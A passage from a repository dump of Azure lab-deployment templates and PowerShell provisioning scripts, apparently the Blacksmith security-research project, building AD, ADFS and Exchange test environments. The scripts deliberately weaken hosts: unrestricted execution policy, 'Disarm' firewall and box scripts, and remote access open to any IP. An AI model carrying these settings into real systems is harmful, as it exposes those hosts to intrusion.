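# in process listings for the duration of the install.
$installer = Start-Process -FilePath "Azure ATP Sensor Setup\Azure ATP Sensor Setup.exe" -ArgumentList @("/quiet","NetFrameworkCommandLineArguments=/q","AccessKey=$AccessKey") -RedirectStandardOutput "MDIStandardOutput.txt" -RedirectStandardError "MDIStandardError.txt" -NoNewWindow -Wait -PassThru

# Previously the script reported success regardless of the installer's result.
# 0 is success; 3010 is ERROR_SUCCESS_REBOOT_REQUIRED, which Windows installers
# commonly return when the install succeeded but a reboot is pending.
if ($installer.ExitCode -notin @(0, 3010)) {
    throw "Azure ATP Sensor Setup.exe exited with code $($installer.ExitCode); see MDIStandardError.txt"
}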
--------------------------------------------------------------------------------
/templates/azure/Storage-Account-Private-Container/images/AzureDefenderStorage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/templates/azure/Storage-Account-Private-Container/images/AzureDefenderStorage.png
--------------------------------------------------------------------------------
/templates/azure/Storage-Account-Private-Container/images/DiagnosticLogging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/templates/azure/Storage-Account-Private-Container/images/DiagnosticLogging.png
--------------------------------------------------------------------------------
/templates/azure/Storage-Account-Queue-Services/README.md:
--------------------------------------------------------------------------------
1 | # Storage Account & Queue Services
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FStorage-Account-Queue-Services%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FStorage-Account-Queue-Services%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/User-Assigned-Managed-Identity/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "name": {
6 | "type": "string",
7 | "minLength": 3,
8 | "maxLength": 128,
9 | "metadata": {
10 | "description": "User Assigned Managed identity name"
11 | }
12 | },
13 | "location": {
14 | "type": "string",
15 | "defaultValue": "[resourceGroup().location]",
16 | "metadata": {
17 | "description": "Location for all resources."
18 | }
19 | }
20 | },
21 | "variables": {},
22 | "resources": [
23 | {
24 | "type": "Microsoft.ManagedIdentity/userAssignedIdentities",
25 | "name": "[parameters('name')]",
26 | "apiVersion": "2018-11-30",
27 | "location": "[parameters('location')]"
28 | }
29 | ],
30 | "outputs": {
31 | "identityName": {
32 | "type": "string",
33 | "value": "[parameters('name')]"
34 | },
35 | "identityId": {
36 | "type": "string",
37 | "value": "[resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', parameters('name'))]"
38 | }
39 | }
40 | }
--------------------------------------------------------------------------------
/templates/azure/Virtual-Network-Peerings/README.md:
--------------------------------------------------------------------------------
1 | # Virtual Network Peerings
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FVirtual-Network-Peerings%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FVirtual-Network-Peerings%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Virtual-Network-Peerings/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "sourceVnet": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the source virtual network"
9 | }
10 | },
11 | "sourceVnetId": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Id of the source virtual network"
15 | }
16 | },
17 | "targetVnet": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Name of the target virtual network"
21 | }
22 | },
23 | "targetVnetId": {
24 | "type": "string",
25 | "metadata": {
26 | "description": "Id of the target virtual network"
27 | }
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('sourceVnet'), '/peering-to-remote-', parameters('targetVnet'))]",
39 | "type": "Microsoft.Network/virtualNetworks/virtualNetworkPeerings",
40 | "apiVersion": "2019-11-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "allowVirtualNetworkAccess": true,
44 | "allowForwardedTraffic": false,
45 | "allowGatewayTransit": false,
46 | "useRemoteGateways": false,
47 | "remoteVirtualNetwork": {
48 | "id": "[parameters('targetVnetId')]"
49 | }
50 | }
51 | },
52 | {
53 | "name": "[concat(parameters('targetVnet'), '/peering-to-remote-', parameters('sourceVnet'))]",
54 | "type": "Microsoft.Network/virtualNetworks/virtualNetworkPeerings",
55 | "apiVersion": "2019-11-01",
56 | "location": "[parameters('location')]",
57 | "properties": {
58 | "allowVirtualNetworkAccess": true,
59 | "allowForwardedTraffic": false,
60 | "allowGatewayTransit": false,
61 | "useRemoteGateways": false,
62 | "remoteVirtualNetwork": {
63 | "id": "[parameters('sourceVnetId')]"
64 | }
65 | }
66 | }
67 | ]
68 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server-Hybrid-Runbook-Worker/README.md:
--------------------------------------------------------------------------------
1 | # Windows Server Hybrid Runbook Worker
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-Hybrid-Runbook-Worker%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-Hybrid-Runbook-Worker%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win-Server-HyperV/README.md:
--------------------------------------------------------------------------------
1 | # Windows Server + Hyper-V
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-HyperV%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server-HyperV%2Fazuredeploy.json)
4 |
5 | ## References:
6 |
7 | * https://github.com/Azure/azure-quickstart-templates/tree/master/demos/nested-vms-in-virtual-network
--------------------------------------------------------------------------------
/templates/azure/Win-Server-HyperV/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "adminUsername": {
6 | "value": "GEN-UNIQUE"
7 | },
8 | "adminPassword": {
9 | "value": "GEN-PASSWORD"
10 | },
11 | "vmSize": {
12 | "value": "Standard_B2s"
13 | },
14 | "virtualNetworkName": {
15 | "value": "vnet-win"
16 | },
17 | "virtualNetworkAddressRange": {
18 | "value": "192.168.0.0/16"
19 | },
20 | "subnetRange": {
21 | "value": "192.168.2.0/24"
22 | },
23 | "subnetName": {
24 | "value": "snet-win"
25 | },
26 | "remoteAccessMode": {
27 | "value": "AllowPublicIP"
28 | },
29 | "allowedIPAddresses": {
30 | "value": "*"
31 | },
32 | "_artifactsLocation": {
33 | "value": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
34 | },
35 | "_artifactsLocationSasToken": {
36 | "value": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server-HyperV/nestedtemplates/installHyperV.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installHyperVScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('installHyperVScript')]",
33 | "script": "Install-HyperV.ps1",
34 | "function": "Install-HyperV"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {}
39 | }
40 | }
41 | ]
42 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server/README.md:
--------------------------------------------------------------------------------
1 | # Windows Server
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin-Server%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win-Server/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "adminUsername": {
6 | "value": "GEN-UNIQUE"
7 | },
8 | "adminPassword": {
9 | "value": "GEN-PASSWORD"
10 | },
11 | "vmSize": {
12 | "value": "Standard_B2s"
13 | },
14 | "virtualNetworkName": {
15 | "value": "vnet-win"
16 | },
17 | "virtualNetworkAddressRange": {
18 | "value": "192.168.0.0/16"
19 | },
20 | "subnetRange": {
21 | "value": "192.168.2.0/24"
22 | },
23 | "subnetName": {
24 | "value": "snet-win"
25 | },
26 | "remoteAccessMode": {
27 | "value": "AllowPublicIP"
28 | },
29 | "allowedIPAddresses": {
30 | "value": "*"
31 | },
32 | "_artifactsLocation": {
33 | "value": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
34 | },
35 | "_artifactsLocationSasToken": {
36 | "value": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/templates/azure/Win-Server/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
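# NOTE(review): Unrestricted applies machine-wide and is broader than running
# this lab's own scripts needs — confirm before narrowing (e.g. to RemoteSigned).
Set-ExecutionPolicy Unrestricted -Force

# Fail fast from here on: with the default 'Continue', a module that did not
# install would only surface later, when the DSC configuration that imports it fails.
$ErrorActionPreference = 'Stop'

# PSGallery requires TLS 1.2; older .NET defaults may offer only TLS 1.0/1.1.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Bootstrap the NuGet provider and trust PSGallery so Install-Module does not prompt.
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

# DSC resource modules, pinned to specific versions so every build installs the
# same reviewed code rather than whatever is newest on the gallery.
Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0

Install-Module -Name xDnsServer -RequiredVersion 2.0.0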
--------------------------------------------------------------------------------
/templates/azure/Win-Server/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
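# Run the post-deployment configuration steps in order.
# Fail fast: each step below assumes the earlier ones applied, so continuing
# past a failure would leave a host that looks configured but is not (e.g. audit
# categories or SACLs silently missing).
# NOTE(review): this preference is inherited by the child scripts, so any
# non-terminating error in them now aborts the sequence — TODO confirm none of
# them emit expected/benign errors.
$ErrorActionPreference = 'Stop'

# Install DSC Modules
& .\Install-DSC-Modules.ps1

# Custom Settings applied
& .\Prepare-Box.ps1

# Additional configs
& .\Disarm-Box.ps1

# Additional Firewall rules
& .\Disarm-Firewall.ps1

# Enable PSRemoting
& .\Configure-PSRemoting.ps1

# Windows Security Audit Categories
& .\Enable-WinAuditCategories.ps1 -SetDC

# PowerShell Logging
& .\Enable-PowerShell-Logging.ps1

# Set SACLs
& .\Set-SACLs.ps1

# Set Wallpaper
& .\Set-WallPaper.ps1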
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Windows Server (Active Directory) + Windows Server (Active Directory Federation Services)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-ADFS%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-ADFS%2Fazuredeploy.json)
4 |
5 | ## Resources
6 |
7 | * One Windows Active Directory domain (One Domain Controller)
8 | * Active Directory Certificate Services (AD CS) Certification Authority (CA) role service enabled
9 | * Enterprise Root Certificate Authority created
10 | * ADFS Site Certificate created
11 | * ADFS Signing Certificate created
12 | * ADFS Decryption Certificate created
13 | * SMB share C:\Setup created to distribute ADFS certificates (.CER & .PFX files)
14 | * Full Access: Domain Admins & Domain Computers
15 | * Read Access: Authenticated Users
16 | * ADFS service account created
17 | * Azure Active Directory (AAD) Connect installed
18 | * One Windows Active Directory Federation Services (ADFS) server
19 | * Active Directory Federation Services Role Service enabled
20 | * ADFS .pfx certificate retrieved from DC C:\Setup share
21 | * ADFS farm installed
22 | * Idp-Initiated Sign On page enabled
23 | * ADFS WebContent customized (Title, Web Theme, SignIn description)
24 | * ADFS Logging (SuccessAudits & FailureAudits) enabled
25 | * ADFS Auditing
26 | * Level: Verbose
27 | * Auditpol command: auditpol.exe /set /subcategory:"Application Generated" /failure:enable /success:enable
28 | * Azure Active Directory (AAD) Connect installed
29 | * Windows 10 Workstations (Max. 10)
30 | * [OPTIONAL] Windows [Microsoft Monitoring Agent](https://docs.microsoft.com/en-us/services-hub/health/mma-setup) installed
31 | * It connects to the Log Analytics workspace defined in the template.
32 | * [OPTIONAL] Sysmon
33 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml)
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/nestedtemplates/importPfxCert.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "importPfxCertScript": {
9 | "type": "string"
10 | },
11 | "PfxCertPath": {
12 | "type": "string"
13 | },
14 | "pfxCertPassword": {
15 | "type": "securestring"
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | }
22 | }
23 | },
24 | "resources": [
25 | {
26 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
27 | "type": "Microsoft.Compute/virtualMachines/extensions",
28 | "apiVersion": "2019-12-01",
29 | "location": "[parameters('location')]",
30 | "properties": {
31 | "publisher": "Microsoft.Powershell",
32 | "type": "DSC",
33 | "typeHandlerVersion": "2.77",
34 | "autoUpgradeMinorVersion": true,
35 | "settings": {
36 | "wmfVersion": "latest",
37 | "configuration": {
38 | "url": "[parameters('importPfxCertScript')]",
39 | "script": "Import-PfxCert.ps1",
40 | "function": "Import-PfxCert"
41 | },
42 | "configurationArguments": {
43 | "PfxCertPath": "[parameters('PfxCertPath')]"
44 | }
45 | },
46 | "protectedSettings": {
47 | "configurationArguments": {
48 | "PfxCertCreds": {
49 | "UserName": "admin",
50 | "Password": "[parameters('pfxCertPassword')]"
51 | }
52 | }
53 | }
54 | }
55 | }
56 | ]
57 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/nestedtemplates/installADFS.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installADFSScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "federationServiceName": {
15 | "type": "string"
16 | },
17 | "adminUsername": {
18 | "type": "string"
19 | },
20 | "adminPassword": {
21 | "type": "securestring"
22 | },
23 | "adfsUsername": {
24 | "type": "string"
25 | },
26 | "adfsPassword": {
27 | "type": "securestring"
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
39 | "type": "Microsoft.Compute/virtualMachines/extensions",
40 | "apiVersion": "2019-12-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "publisher": "Microsoft.Powershell",
44 | "type": "DSC",
45 | "typeHandlerVersion": "2.77",
46 | "autoUpgradeMinorVersion": true,
47 | "settings": {
48 | "wmfVersion": "latest",
49 | "configuration": {
50 | "url": "[parameters('installADFSScript')]",
51 | "script": "Install-ADFS.ps1",
52 | "function": "Install-ADFS"
53 | },
54 | "configurationArguments": {
55 | "DomainFQDN": "[parameters('DomainFQDN')]",
56 | "FederationServiceName": "[parameters('federationServiceName')]"
57 | }
58 | },
59 | "protectedSettings": {
60 | "configurationArguments": {
61 | "AdminCreds": {
62 | "UserName": "[parameters('adminUsername')]",
63 | "Password": "[parameters('adminPassword')]"
64 | },
65 | "AdfsAdminCreds": {
66 | "UserName": "[parameters('adfsUsername')]",
67 | "Password": "[parameters('adfsPassword')]"
68 | }
69 | }
70 | }
71 | }
72 | }
73 | ]
74 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
#Requires -Version 5
# Installs the DSC resource modules used by the Win10-AD-ADFS DSC configurations.
# Called by Set-Initial-Settings.ps1 with the VM's role; runs unattended at provisioning time.

[CmdletBinding()]
param (
    # Role of the VM being prepared; selects the role-specific modules at the bottom.
    [Parameter(Mandatory)]
    [ValidateSet("DC","ADFS")]
    [string]$SetupType

)
# Unrestricted removes script-signing enforcement (Set-ExecutionPolicy defaults to the
# LocalMachine scope) and nothing below restores it, so the setting outlives this script.
Set-ExecutionPolicy Unrestricted -Force

# The PowerShell Gallery requires TLS 1.2; force it for the downloads below.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
# Trusting PSGallery suppresses the "untrusted repository" confirmation so the
# unattended Install-Module calls below do not block; it also means anything later
# installed from the gallery on this host is accepted without a prompt.
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

# Modules needed by both roles, pinned to exact versions.
Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0

if ($SetupType -eq 'DC')
{
    Install-Module -Name xDnsServer -RequiredVersion 2.0.0
    # NOTE(review): xSmbShare, MSOnline and AzureAD carry no -RequiredVersion, so the
    # version the gallery serves at deploy time is installed; pinning them like the
    # other modules keeps builds reproducible and keeps an unreviewed upstream release
    # off the domain controller.
    Install-Module -Name xSmbShare -Force
    Install-Module -Name MSOnline -Force
    Install-Module -Name AzureAD -Force
    Install-Module -Name ActiveDirectoryCSDsc -RequiredVersion 5.0.0
    Install-Module -Name CertificateDsc -RequiredVersion 5.1.0
}
elseif ($SetupType -eq 'ADFS')
{
    Install-Module -Name AdfsDsc -RequiredVersion 1.1.0
}
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-ADFS/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
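# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Entry point run on each Win10-AD-ADFS VM at provisioning time: installs the DSC
# modules, stages the optional CA-issued certificate and applies the lab's baseline
# settings by calling the sibling scripts in a fixed order.

[CmdletBinding()]
param (
    # Role of the VM; forwarded to Install-DSC-Modules.ps1 and selects the audit profile.
    [Parameter(Mandatory)]
    [ValidateSet("DC","ADFS")]
    [string]$SetupType,

    # TrustedSigned expects a CA-issued PFX to be staged; SelfSigned needs no file.
    [Parameter(Mandatory)]
    [ValidateSet('TrustedSigned','SelfSigned')]
    [string]$CertificateType,

    # Path to the PFX file; only used (and only required) when -CertificateType is TrustedSigned.
    [Parameter(Mandatory=$false)]
    [string]$PfxCertName
)

# Install DSC Modules
& .\Install-DSC-Modules.ps1 -SetupType $SetupType

if ($CertificateType -eq 'TrustedSigned')
{
    # $PfxCertName is optional at the parameter level, so it has to be validated here
    # where it is actually needed. Without this, Move-Item raised a non-terminating
    # error on an empty or missing path and the rest of the setup carried on without
    # the certificate the ADFS configuration depends on.
    if ([string]::IsNullOrWhiteSpace($PfxCertName))
    {
        throw "-PfxCertName is required when -CertificateType is 'TrustedSigned'."
    }
    if (-not (Test-Path -Path $PfxCertName -PathType Leaf))
    {
        throw "PFX certificate '$PfxCertName' was not found."
    }

    # Move trusted CA signed SSL certificate
    # NOTE(review): C:\ProgramData is readable by standard users by default and the PFX
    # carries the private key; confirm the consuming DSC configuration deletes the file
    # once it has been imported.
    Move-Item $PfxCertName C:\ProgramData\ -ErrorAction Stop
}

# Custom Settings applied
& .\Prepare-Box.ps1

# Additional configs
& .\Disarm-Box.ps1

# Additional Firewall rules
& .\Disarm-Firewall.ps1

# Enable PSRemoting
& .\Configure-PSRemoting.ps1

# Windows Security Audit Categories: the DC gets the domain-controller profile.
if ($SetupType -eq 'DC')
{
    & .\Enable-WinAuditCategories.ps1 -SetDC
}
else
{
    & .\Enable-WinAuditCategories.ps1
}

# PowerShell Logging
& .\Enable-PowerShell-Logging.ps1

# Set SACLs
& .\Set-SACLs.ps1

# Set Wallpaper
& .\Set-WallPaper.ps1

# Add custom domain to intranet
<#
$IntranetDomainSite = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\blacksmith.local'
if (-not (Test-Path -Path $IntranetDomainSite))
{
    $null = New-Item -Path $IntranetDomainSite -Force
}

Set-ItemProperty -Path $IntranetDomainSite -Name http -Value 1 -Type DWord
Set-ItemProperty -Path $IntranetDomainSite -Name https -Value 1 -Type DWord
#>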
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/createADForest.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "createADForestScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "adminUsername": {
15 | "type": "string"
16 | },
17 | "adminPassword": {
18 | "type": "securestring"
19 | },
20 | "domainUsers": {
21 | "type": "secureObject"
22 | },
23 | "location": {
24 | "type": "string",
25 | "metadata": {
26 | "description": "Location for all resources."
27 | }
28 | }
29 | },
30 | "resources": [
31 | {
32 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
33 | "type": "Microsoft.Compute/virtualMachines/extensions",
34 | "apiVersion": "2019-12-01",
35 | "location": "[parameters('location')]",
36 | "properties": {
37 | "publisher": "Microsoft.Powershell",
38 | "type": "DSC",
39 | "typeHandlerVersion": "2.77",
40 | "autoUpgradeMinorVersion": true,
41 | "settings": {
42 | "wmfVersion": "latest",
43 | "configuration": {
44 | "url": "[parameters('createADForestScript')]",
45 | "script": "Create-AD.ps1",
46 | "function": "Create-AD"
47 | },
48 | "configurationArguments": {
49 | "DomainFQDN": "[parameters('DomainFQDN')]"
50 | }
51 | },
52 | "protectedSettings": {
53 | "configurationArguments": {
54 | "AdminCreds": {
55 | "UserName": "[parameters('adminUsername')]",
56 | "Password": "[parameters('adminPassword')]"
57 | },
58 | "DomainUsers": "[parameters('domainUsers').array]"
59 | }
60 | }
61 | }
62 | }
63 | ]
64 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "minLength": 1,
8 | "metadata": {
9 | "description": "Name of the Windows machine to run scripts on"
10 | }
11 | },
12 | "extensionName": {
13 | "type": "string"
14 | },
15 | "fileUris": {
16 | "type": "array"
17 | },
18 | "commandToExecute": {
19 | "type": "string"
20 | },
21 | "location": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Location for all resources."
25 | }
26 | }
27 | },
28 | "resources": [
29 | {
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2016-08-30",
32 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
33 | "location": "[parameters('location')]",
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/installMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installMXScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "domainController": {
15 | "type": "string"
16 | },
17 | "mxsRelease": {
18 | "type": "string"
19 | },
20 | "mxsISODirectory": {
21 | "type": "string"
22 | },
23 | "adminUsername": {
24 | "type": "string"
25 | },
26 | "adminPassword": {
27 | "type": "securestring"
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
39 | "type": "Microsoft.Compute/virtualMachines/extensions",
40 | "apiVersion": "2019-12-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "publisher": "Microsoft.Powershell",
44 | "type": "DSC",
45 | "typeHandlerVersion": "2.77",
46 | "autoUpgradeMinorVersion": true,
47 | "settings": {
48 | "wmfVersion": "latest",
49 | "configuration": {
50 | "url": "[parameters('installMXScript')]",
51 | "script": "Install-MSExchange.ps1",
52 | "function": "Install-MSExchange"
53 | },
54 | "configurationArguments": {
55 | "DomainFQDN": "[parameters('domainFQDN')]",
56 | "DomainController": "[parameters('domainController')]",
57 | "MXSRelease": "[parameters('mxsRelease')]",
58 | "MXSISODirectory": "[parameters('mxsISODirectory')]"
59 | }
60 | },
61 | "protectedSettings": {
62 | "configurationArguments": {
63 | "AdminCreds": {
64 | "UserName": "[parameters('adminUsername')]",
65 | "Password": "[parameters('adminPassword')]"
66 | }
67 | }
68 | }
69 | }
70 | }
71 | ]
72 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/postInstallMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "postInstallMXScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "adminUsername": {
15 | "type": "string"
16 | },
17 | "adminPassword": {
18 | "type": "securestring"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2019-12-01",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Powershell",
35 | "type": "DSC",
36 | "typeHandlerVersion": "2.77",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {
39 | "wmfVersion": "latest",
40 | "configuration": {
41 | "url": "[parameters('postInstallMXScript')]",
42 | "script": "PostInstall-MSExchange.ps1",
43 | "function": "PostInstall-MSExchange"
44 | },
45 | "configurationArguments": {
46 | "DomainFQDN": "[parameters('domainFQDN')]"
47 | }
48 | },
